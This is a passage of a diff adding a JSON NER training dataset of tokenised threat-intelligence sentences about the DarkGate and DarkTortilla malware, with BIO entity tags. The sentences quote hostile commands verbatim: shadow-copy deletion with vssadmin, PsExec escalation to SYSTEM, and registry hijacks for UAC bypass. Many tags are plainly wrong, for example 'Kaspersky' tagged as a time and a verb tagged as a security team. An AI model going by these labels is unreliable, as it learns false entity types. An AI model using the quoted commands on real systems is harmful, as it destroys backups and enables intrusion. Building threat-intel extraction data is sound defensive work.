"B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "command", + "and", + "control", + "includes", + "hard-coded", + "domains", + "in", + "the", + "malware", + "chosen", + "to", + "masquerade", + "as", + "legitimate", + "services", + "such", + "as", + "Akamai", + "CDN", + "or", + "Amazon", + "Web", + "Services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "masquerades", + "malicious", + "LNK", + "files", + "as", + "PDF", + "objects", + "using", + "the", + "double", + "extension", + "<code>.pdf.lnk</code>." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DarkGate", + "drops", + "an", + "encrypted", + "PE", + "file,", + "pe.bin,", + "and", + "decrypts", + "it", + "during", + "installation.", + "DarkGate", + "also", + "uses", + "custom", + "base64", + "encoding", + "schemas", + "in", + "later", + "variations", + "to", + "obfuscate", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "uses", + "per-victim", + "links", + "for", + "hosting", + "malicious", + "archives,", + "such", + "as", + "ZIP", + "files,", + "in", + "services", + "such", + "as", + "SharePoint", + "to", + "prevent", + "other", + "entities", + "from", + "retrieving", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "uses", + "existing", + "command", + "and", + "control", + "channels", + "to", + "retrieve", + "captured", + "cryptocurrency", + "wallet", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "versions", + "of", + "DarkGate", + "search", + "for", + "the", + "hard-coded", + "folder", + "<code>C:\\Program", + "Files\\e", + "Carte", + "Bleue</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "can", + "deploy", + "payloads", + "capable", + "of", + "capturing", + "credentials", + "related", + "to", + "cryptocurrency", + "wallets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "initial", + "installation", + "involves", + "dropping", + "several", + "files", + "to", + "a", + "hidden", + "directory", + "named", + "after", + "the", + "victim", + "machine", + "name." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "command", + "and", + "control", + "includes", + "hard-coded", + "domains", + "in", + "the", + "malware", + "masquerading", + "as", + "legitimate", + "services", + "such", + "as", + "Akamai", + "CDN", + "or", + "Amazon", + "Web", + "Services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Tool", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "DarkGate", + "edits", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Classes\\mscfile\\shell\\open\\command</code>", + "to", + "execute", + "a", + "malicious", + "AutoIt", + "script.", + "When", + "eventvwr.exe", + "is", + "executed,", + "this", + "will", + "call", + "the", + "Microsoft", + "Management", + "Console", + "(mmc.exe),", + "which", + "in", + "turn", + "references", + "the", + "modified", + "Registry", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "retrieves", + "cryptocurrency", + "mining", + "payloads", + "and", + "commands", + "in", + "encrypted", + "traffic", + "from", + "its", + "command", + "and", + "control", + "server.", + "DarkGate", + "uses", + "Windows", + "Batch", + "scripts", + "executing", + "the", + "<code>curl</code>", + "command", + "to", + "retrieve", + "follow-on", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "can", + "delete", + "system", + "restore", + "points", + "through", + "the", + "command", + "<code>cmd.exe", + "/c", + "vssadmin", + "delete", + "shadows", + "/for=c:", + "/all", + "/quiet”</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "will", + "spawn", + "a", + "thread", + "on", + "execution", + "to", + "capture", + "all", + "keyboard", + "events", + "and", + "write", + "them", + "to", + "a", + "predefined", + "log", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "creates", + "a", + "local", + "user", + "account,", + "<code>SafeMode</code>,", + "via", + "<code>net", + "user</code>", + "commands." + ], + "ner_tags": [ + "B-Idus", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "initial", + "infection", + "payloads", + "can", + "masquerade", + "as", + "pirated", + "media", + "content", + "requiring", + "user", + "interaction", + "for", + "code", + "execution.", + "DarkGate", + "is", + "distributed", + "through", + "phishing", + "links", + "to", + "VBS", + "or", + "MSI", + "objects", + "requiring", + "user", + "interaction", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "can", + "masquerade", + "as", + "pirated", + "media", + "content", + "for", + "initial", + "delivery", + "to", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "uses", + "the", + "native", + "Windows", + "API", + "<code>CallWindowProc()</code>", + "to", + "decode", + "and", + "launch", + "encoded", + "shellcode", + "payloads", + "during", + "execution.", + "DarkGate", + "can", + "call", + "kernel", + "mode", + "functions", + "directly", + "to", + "hide", + "the", + "use", + "of", + "process", + "hollowing", + "methods", + "during", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "uses", + "a", + "hard-coded", + "string", + "as", + "a", + "seed,", + "along", + "with", + "the", + "victim", + "machine", + "hardware", + "identifier", + "and", + "input", + "text,", + "to", + "generate", + "a", + "unique", + "string", + "used", + "as", + "an", + "internal", + "mutex", + "value", + "to", + "evade", + "static", + "detection", + "based", + "on", + "mutexes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "relies", + "on", + "parent", + "PID", + "spoofing", + "as", + "part", + "of", + "its", + "\"rootkit-like\"", + "functionality", + "to", + "evade", + "detection", + "via", + "Task", + "Manager", + "or", + "Process", + "Explorer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "overrides", + "the", + "<code>%windir%</code>", + "environment", + "variable", + "by", + "setting", + "a", + "Registry", + "key,", + "<code>HKEY_CURRENT_User\\Environment\\windir</code>,", + "to", + "an", + "alternate", + "command", + "to", + "execute", + "a", + "malicious", + "AutoIt", + "script.", + "This", + "allows", + "DarkGate", + "to", + "run", + "every", + "time", + "the", + "scheduled", + "task", + "<code>DiskCleanup</code>", + "is", + "executed", + "as", + "this", + "uses", + "the", + "path", + "value", + "<code>%windir%\\system32\\cleanmgr.exe</code>", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "performs", + "various", + "checks", + "for", + "running", + "processes,", + "including", + "security", + "software", + "by", + "looking", + "for", + "hard-coded", + "process", + "name", + "values." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "leverages", + "process", + "hollowing", + "techniques", + "to", + "evade", + "detection,", + "such", + "as", + "decrypting", + "the", + "content", + "of", + "an", + "encrypted", + "PE", + "file", + "and", + "injecting", + "it", + "into", + "the", + "process", + "vbc.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DarkGate", + "installation", + "includes", + "AutoIt", + "script", + "execution", + "creating", + "a", + "shortcut", + "to", + "itself", + "as", + "an", + "LNK", + "object,", + "such", + "as", + "bill.lnk,", + "in", + "the", + "victim", + "startup", + "folder.", + "DarkGate", + "installation", + "finishes", + "with", + "the", + "creation", + "of", + "a", + "registry", + "Run", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "executes", + "a", + "Windows", + "Batch", + "script", + "during", + "installation", + "that", + "creases", + "a", + "randomly-named", + "directory", + "in", + "the", + "<code>C:\\\\</code>", + "root", + "directory", + "that", + "copies", + "and", + "renames", + "the", + "legitimate", + "Windows", + "<curl>curl</code>", + "command", + "to", + "this", + "new", + "location." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "can", + "deploy", + "follow-on", + "cryptocurrency", + "mining", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "looks", + "for", + "various", + "security", + "products", + "by", + "process", + "name", + "using", + "hard-coded", + "values", + "in", + "the", + "malware.", + "DarkGate", + "will", + "not", + "execute", + "its", + "keylogging", + "thread", + "if", + "a", + "process", + "name", + "associated", + "with", + "Trend", + "Micro", + "anti-virus", + "is", + "identified,", + "or", + "if", + "runtime", + "checks", + "identify", + "the", + "presence", + "of", + "Kaspersky", + "anti-virus.", + "DarkGate", + "will", + "initiate", + "a", + "new", + "thread", + "if", + "certain", + "security", + "products", + "are", + "identified", + "on", + "the", + "victim,", + "and", + "recreate", + "any", + "malicious", + "files", + "associated", + "with", + "it", + "if", + "it", + "determines", + "they", + "were", + "removed", + "by", + "security", + "software", + "in", + "a", + "new", + "system", + "location." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-SecTeam", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "tries", + "to", + "elevate", + "privileges", + "to", + "<code>SYSTEM</code>", + "using", + "PsExec", + "to", + "locally", + "execute", + "as", + "a", + "service,", + "such", + "as", + "<code>cmd", + "/c", + "c:\\temp\\PsExec.exe", + "-accepteula", + "-j", + "-d", + "-s", + "[Target", + "Binary]</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "can", + "be", + "distributed", + "through", + "emails", + "with", + "malicious", + "attachments", + "from", + "a", + "spoofed", + "email", + "address." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "is", + "distributed", + "in", + "phishing", + "emails", + "containing", + "links", + "to", + "distribute", + "malicious", + "VBS", + "or", + "MSI", + "files.", + "DarkGate", + "uses", + "applications", + "such", + "as", + "Microsoft", + "Teams", + "for", + "distributing", + "links", + "to", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "queries", + "system", + "resources", + "on", + "an", + "infected", + "machine", + "to", + "identify", + "if", + "it", + "is", + "executing", + "in", + "a", + "sandbox", + "or", + "virtualized", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "uses", + "the", + "Delphi", + "methods", + "<code>Sysutils::DiskSize</code>", + "and", + "<code>GlobalMemoryStatusEx</code>", + "to", + "collect", + "disk", + "size", + "and", + "physical", + "memory", + "as", + "part", + "of", + "the", + "malware's", + "anti-analysis", + "checks", + "for", + "running", + "in", + "a", + "virtualized", + "environment.", + "DarkGate", + "will", + "gather", + "various", + "system", + "information", + "such", + "as", + "display", + "adapter", + "description,", + "operating", + "system", + "type", + "and", + "version,", + "processor", + "type,", + "and", + "RAM", + "amount." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "queries", + "system", + "locale", + "information", + "during", + "execution.", + "Later", + "versions", + "of", + "DarkGate", + "query", + "<code>GetSystemDefaultLCID</code>", + "for", + "locale", + "information", + "to", + "determine", + "if", + "the", + "malware", + "is", + "executing", + "in", + "Russian-speaking", + "countries." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "creates", + "a", + "log", + "file", + "for", + "capturing", + "keylogging,", + "clipboard,", + "and", + "related", + "data", + "using", + "the", + "victim", + "host's", + "current", + "date", + "for", + "the", + "filename.", + "DarkGate", + "queries", + "victim", + "system", + "epoch", + "time", + "during", + "execution.", + "DarkGate", + "captures", + "system", + "time", + "information", + "as", + "part", + "of", + "automated", + "profiling", + "on", + "initial", + "installation." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "uses", + "NirSoft", + "tools", + "to", + "steal", + "user", + "credentials", + "from", + "the", + "infected", + "machine.", + "NirSoft", + "tools", + "are", + "executed", + "via", + "process", + "hollowing", + "in", + "a", + "newly-created", + "instance", + "of", + "vbc.exe", + "or", + "regasm.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DarkGate", + "initial", + "infection", + "mechanisms", + "include", + "masquerading", + "as", + "pirated", + "media", + "that", + "launches", + "malicious", + "VBScript", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "uses", + "a", + "malicious", + "Windows", + "Batch", + "script", + "to", + "run", + "the", + "Windows", + "<code>code</code>", + "utility", + "to", + "retrieve", + "follow-on", + "script", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "detect", + "profilers", + "by", + "verifying", + "the", + "`COR_ENABLE_PROFILING`", + "environment", + "variable", + "is", + "present", + "and", + "active." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "download", + "a", + "clipboard", + "information", + "stealer", + "module." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "has", + "used", + "the", + "`WshShortcut`", + "COM", + "object", + "to", + "create", + "a", + ".lnk", + "shortcut", + "file", + "in", + "the", + "Windows", + "startup", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "detect", + "debuggers", + "by", + "using", + "functions", + "such", + "as", + "`DebuggerIsAttached`", + "and", + "`DebuggerIsLogging`.", + "DarkTortilla", + "can", + "also", + "detect", + "profilers", + "by", + "verifying", + "the", + "`COR_ENABLE_PROFILING`", + "environment", + "variable", + "is", + "present", + "and", + "active." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "decrypt", + "its", + "payload", + "and", + "associated", + "configuration", + "elements", + "using", + "the", + "Rijndael", + "cipher." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "use", + "a", + ".NET-based", + "DLL", + "named", + "`RunPe6`", + "for", + "process", + "injection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "has", + "used", + "`%HiddenReg%`", + "and", + "`%HiddenKey%`", + "as", + "part", + "of", + "its", + "persistence", + "via", + "the", + "Windows", + "registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "download", + "additional", + "packages", + "for", + "keylogging,", + "cryptocurrency", + "mining,", + "and", + "other", + "capabilities;", + "it", + "can", + "also", + "retrieve", + "malicious", + "payloads", + "such", + "as", + "Agent", + "Tesla,", + "AsyncRat,", + "NanoCore,", + "RedLine,", + "Cobalt", + "Strike,", + "and", + "Metasploit." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "check", + "for", + "internet", + "connectivity", + "by", + "issuing", + "HTTP", + "GET", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "download", + "a", + "keylogging", + "module." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "has", + "relied", + "on", + "a", + "user", + "to", + "open", + "a", + "malicious", + "document", + "or", + "archived", + "file", + "delivered", + "via", + "email", + "for", + "initial", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla's", + "payload", + "has", + "been", + "renamed", + "`PowerShellInfo.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DarkTortilla", + "has", + "modified", + "registry", + "keys", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "use", + "a", + "variety", + "of", + "API", + "calls", + "for", + "persistence", + "and", + "defense", + "evasion." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "DarkTortilla", + "has", + "been", + "obfuscated", + "with", + "the", + "DeepSea", + ".NET", + "and", + "ConfuserEx", + "code", + "obfuscators." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "enumerate", + "a", + "list", + "of", + "running", + "processes", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "has", + "established", + "persistence", + "via", + "the", + "`Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Run`", + "registry", + "key", + "and", + "by", + "creating", + "a", + ".lnk", + "shortcut", + "file", + "in", + "the", + "Windows", + "startup", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "check", + "for", + "the", + "Kaspersky", + "Anti-Virus", + "suite." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Time", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "has", + "been", + "distributed", + "via", + "spearphishing", + "emails", + "containing", + "archive", + "attachments,", + "with", + "file", + "types", + "such", + "as", + ".iso,", + ".zip,", + ".img,", + ".dmg,", + "and", + ".tar,", + "as", + "well", + "as", + "through", + "malicious", + "documents." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "search", + "a", + "compromised", + "system's", + "running", + "processes", + "and", + "services", + "to", + "detect", + "Hyper-V,", + "QEMU,", + "Virtual", + "PC,", + "Virtual", + "Box,", + "and", + "VMware,", + "as", + "well", + "as", + "Sandboxie." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Idus", + "I-Tool", + "O", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "obtain", + "system", + "information", + "by", + "querying", + "the", + "`Win32_ComputerSystem`,", + "`Win32_BIOS`,", + "`Win32_MotherboardDevice`,", + "`Win32_PnPEntity`,", + "and", + "`Win32_DiskDrive`", + "WMI", + "objects." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "retrieve", + "information", + "about", + "a", + "compromised", + "system's", + "running", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "implement", + "the", + "`kernel32.dll`", + "Sleep", + "function", + "to", + "delay", + "execution", + "for", + "up", + "to", + "300", + "seconds", + "before", + "implementing", + "persistence", + "or", + "processing", + "an", + "addon", + "package." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "has", + "used", + "HTTP", + "and", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "retrieve", + "its", + "primary", + "payload", + "from", + "public", + "sites", + "such", + "as", + "Pastebin", + "and", + "Textbin." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "use", + "`cmd.exe`", + "to", + "add", + "registry", + "keys", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 